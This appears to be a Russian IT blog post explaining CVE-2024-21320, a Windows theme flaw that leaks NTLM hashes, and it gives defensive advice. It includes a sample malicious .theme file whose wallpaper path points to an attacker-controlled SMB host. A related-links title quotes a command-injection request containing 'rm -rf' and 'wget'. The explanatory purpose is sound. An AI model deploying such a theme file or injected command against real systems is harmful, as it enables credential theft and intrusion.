ITблог
Алексея Черемных
Новое:
Уязвимость BDU:2025-00282 (CVE-2025-21334) в Hyper-V Windows
Уязвимость BDU:2025-00420 (CVE-2025-23018) протоколов туннелирования пакетов IPv4-in-IPv6 и IPv6-in-IPv4
Уязвимость BDU:2025-03867 (CVE-2025-2945) в pgAdmin 4
Уязвимость BDU:2024-09433 (CVE-2024-51774) в qBittorrent
Уязвимость BDU:2025-00281 (CVE-2024-55591) в FortiOS и FortiProxy
CVE-2024-21320: Уязвимость спуфинга в темах Windows и кража NTLM-хешей
CVE-2024-21320: Уязвимость спуфинга в темах Windows и кража NTLM-хешей
Категория: Программы Теги: Уязвимости Опубликовано: 26 марта 2025

CVE-2024-21320: Уязвимость спуфинга в темах Windows и кража NTLM-хешей

CVE-2024-21320 – это уязвимость, связанная с подменой тем в Windows, которая позволяет злоумышленникам перехватывать NTLM-хеши пользователей. Эта уязвимость возникает из-за недостаточной проверки путей к файлам, указанным в файлах тем Windows (.theme).

Как работает уязвимость:

  1. Создание вредоносной темы: Злоумышленник создает специально разработанный файл темы Windows (.theme), который содержит ссылку на удаленный ресурс, контролируемый злоумышленником, например, SMB-сервер. Эта ссылка может быть встроена в качестве пути к обоям рабочего стола, экранной заставке или другим элементам темы.

  2. Распространение вредоносной темы: Злоумышленник распространяет этот вредоносный файл темы среди потенциальных жертв. Это можно сделать через электронную почту, веб-сайты или другие каналы.

  3. Активация темы жертвой: Когда жертва открывает и применяет вредоносную тему, Windows пытается получить доступ к удаленному ресурсу, указанному в файле темы.

  4. Передача NTLM-хеша: При попытке доступа к SMB-серверу Windows автоматически отправляет NTLM-хеш пользователя на этот сервер для аутентификации.

  5. Перехват NTLM-хеша: Злоумышленник, контролирующий SMB-сервер, перехватывает NTLM-хеш пользователя.

  6. Взлом NTLM-хеша: Злоумышленник может попытаться взломать перехваченный NTLM-хеш, используя методы перебора или радужные таблицы, чтобы получить пароль пользователя. Даже если хеш не удастся взломать, он может быть использован для атак типа "pass-the-hash" для получения доступа к другим ресурсам в сети.

Пример вредоносного .theme файла:

[Theme]
DisplayName=Security Update Theme

[Control Panel\Desktop]
Wallpaper=\\\\attacker_ip\\share\\malicious.jpg

[VisualStyles]
Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize

В этом примере attacker_ip – это IP-адрес SMB-сервера, контролируемого злоумышленником. Когда пользователь применяет эту тему, Windows попытается загрузить изображение malicious.jpg с этого сервера, отправляя NTLM-хеш пользователя в процессе.

Как защитить себя и своих пользователей:

  • Установите последние обновления безопасности Windows: Microsoft выпустила исправление для этой уязвимости. Установка последних обновлений безопасности закроет эту брешь.
  • Будьте осторожны с файлами тем из ненадежных источников: Не открывайте и не применяйте файлы тем, полученные из неизвестных или ненадежных источников. Лучше использовать только встроенные в оригинальный дистрибутив темы.
  • Отключите автоматическую отправку NTLM-хешей: Можно настроить Windows так, чтобы она не отправляла NTLM-хеши автоматически при доступе к сетевым ресурсам. Это можно сделать через групповые политики или реестр.
  • Используйте надежные пароли: Использование сложных и уникальных паролей затруднит взлом NTLM-хешей, даже если они будут перехвачены.
  • Включите многофакторную аутентификацию (MFA): MFA добавляет дополнительный уровень защиты, требуя от пользователей подтверждения своей личности с помощью второго фактора, такого как код, отправленный на телефон.
  • Мониторинг сетевого трафика: Мониторинг сетевого трафика может помочь обнаружить попытки эксплуатации этой уязвимости. Обратите внимание на необычные подключения к SMB-серверам или передачу NTLM-хешей.
  • Используйте инструменты для обнаружения и предотвращения вторжений (IDS/IPS): IDS/IPS могут помочь обнаружить и блокировать вредоносные файлы тем или попытки эксплуатации уязвимости.

Дополнительные меры предосторожности:

  • Обучите пользователей: Обучите пользователей распознавать и избегать подозрительные файлы и ссылки.
  • Используйте антивирусное программное обеспечение: Антивирусное программное обеспечение может помочь обнаружить и блокировать вредоносные файлы тем.
  • Регулярно проводите аудит безопасности: Регулярный аудит безопасности поможет выявить и устранить потенциальные уязвимости в вашей системе.

В заключение:

Уязвимость CVE-2024-21320 представляет серьезную угрозу для безопасности Windows. Следуя приведенным выше рекомендациям, вы можете значительно снизить риск эксплуатации этой уязвимости и защитить себя и своих пользователей от кражи учетных данных.

Алексей Черемных Алексей Черемных
56

Похожие материалы:

Что за атака index.php?option= com_jce&task=plugin& plugin=imgmanager
9 мая 2023
Что за атака index.php?option= com_jce&task=plugin& plugin=imgmanager
Что за атака GET /include/dialog/ select_soft_post.php
10 мая 2023
Что за атака GET /include/dialog/ select_soft_post.php
Уязвимость CVE-2023-28771 позволяет выполнять удаленно команды на устройствах Zyxel
16 июля 2023
Уязвимость CVE-2023-28771 позволяет выполнять удаленно команды на устройствах Zyxel
Как запретить скачивание exe файлов в браузере?
25 сентября 2023
Как запретить скачивание exe файлов в браузере?
Что за атака GET /setup.cgi?next_file=netgear.cfg& todo=syscmd& cmd=rm+-rf+/tmp/*;wget+
26 апреля 2023
Что за атака GET /setup.cgi?next_file=netgear.cfg& todo=syscmd& cmd=rm+-rf+/tmp/*;wget+
Что за атака GET /wp-includes/ wlwmanifest.xml HTTP/1.0
9 мая 2023
Что за атака GET /wp-includes/ wlwmanifest.xml HTTP/1.0